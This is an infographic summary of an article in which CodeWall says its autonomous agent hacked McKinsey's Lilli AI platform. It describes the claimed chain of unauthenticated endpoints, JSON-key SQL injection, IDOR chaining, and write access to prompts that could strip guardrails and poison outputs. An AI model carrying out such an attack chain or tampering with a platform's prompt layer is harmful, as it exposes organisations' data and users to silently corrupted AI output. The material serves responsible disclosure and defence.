Knowledge Graph Infographic

How CodeWall Says It Hacked McKinsey's AI Platform

The article frames Lilli as an enterprise AI control plane whose exposure mattered not just because of data access, but because of potential prompt-layer compromise and the speed of an autonomous offensive agent.

Claimed EntryUnauthenticated endpoint plus JSON-key SQL injection

Claimed ImpactRead-write production data access and prompt-layer risk

Main ThesisAutonomous agents can chain ordinary flaws into high-impact compromise

Attack Chain As Described

The article's core sequence is structured and repeatable: map public exposure, infer exploitability from reflected errors, expand scope by chaining, then disclose.

Map the public attack surface

Public API documentation and unauthenticated endpoints are presented as the initial foothold.

Infer exploitability from reflected errors

The article says reflected database errors revealed a SQL injection path in JSON field names.

Expand scope through chaining

Once database access existed, the agent reportedly chained it with IDOR and broader platform exposure.

Disclose and verify remediation

The article emphasizes responsible disclosure and verification-only testing before public release.

Why The Article Says The Findings Matter

The reported impact is organized around three layers: direct production data exposure, broader AI pipeline visibility, and write access to prompts that shape model behavior.

Production database exposure

The article claims broad access to chats, files, accounts, assistants, and workspaces in plaintext production stores.

RAG document chunks

The article says the retrieval layer exposed chunks of proprietary internal research plus associated metadata and storage paths.

Prompt layer compromise

The strongest claim is that prompt edits could silently poison outputs, remove guardrails, and persist without conventional deployment traces.

Key Technical Terms In The Graph

The article's narrative depends on a small set of reusable concepts: autonomous targeting, public attack surface mapping, unconventional SQL injection, cross-object access, and prompt-layer control.

Attack surface mapping

Enumerating public APIs and reachability before any exploit was attempted.

JSON-key SQL injection

The unusual flaw class the article says standard tools missed because the vulnerable surface was in JSON field names, not normal values.

IDOR chaining

Cross-user access becomes materially worse when database exposure can be linked with direct object reference weaknesses.

Responsible disclosure

The article repeatedly anchors the research in disclosure sequencing and remediation verification.

Entities And Framing

The graph keeps the cast small and explicit: the target organization, the internal system, the research firm, and the public disclosure framing.

McKinsey & Company

The article uses McKinsey's scale and brand to emphasize that legacy bug classes still matter in large, well-resourced organizations.

Lilli

The internal AI platform is presented as both a productivity layer and a concentration point for chats, knowledge, prompts, and workflow metadata.

CodeWall

The article doubles as a research report and a product argument for continuous, AI-driven offensive security testing.

FAQ From The Knowledge Graph

The generated graph includes explicit Question and Answer nodes so the article's claims and framing can be navigated directly.

What system was targeted?

The article says the target was Lilli, McKinsey's internal AI platform.

How did the agent initially get in?

By combining public API documentation, unauthenticated endpoints, and a SQL injection in JSON keys, according to the article.

What made the SQL injection unusual?

The article says the vulnerable surface was in JSON field names rather than only parameter values, so standard scanners missed it.

What kinds of data were reportedly exposed?

Chats, files, user accounts, AI assistants, workspaces, prompt configurations, RAG data, and search histories are all listed in the article.

Why emphasize the prompt layer?

Because prompt writes could silently alter behavior, remove guardrails, and poison trusted outputs without code deployment.

What is the article's main security thesis?

That autonomous offensive agents can map, probe, chain, and escalate real-world weaknesses at machine speed and that prompts are crown-jewel assets.

What did the article say about tooling gaps?

It claims OWASP ZAP did not find the issue, while the autonomous agent inferred it through repeated error-guided iterations.

What was the stated disclosure process?

The article lists discovery on February 28, disclosure on March 1, patch confirmation on March 2, and public disclosure on March 9.

What guardrails were claimed for the research?

The article says testing was verification-only, minimally scoped, non-disruptive, and completed before public disclosure.

What business message does CodeWall attach to the research?

The article uses the incident to promote continuous, AI-driven offensive security testing of real attack surfaces.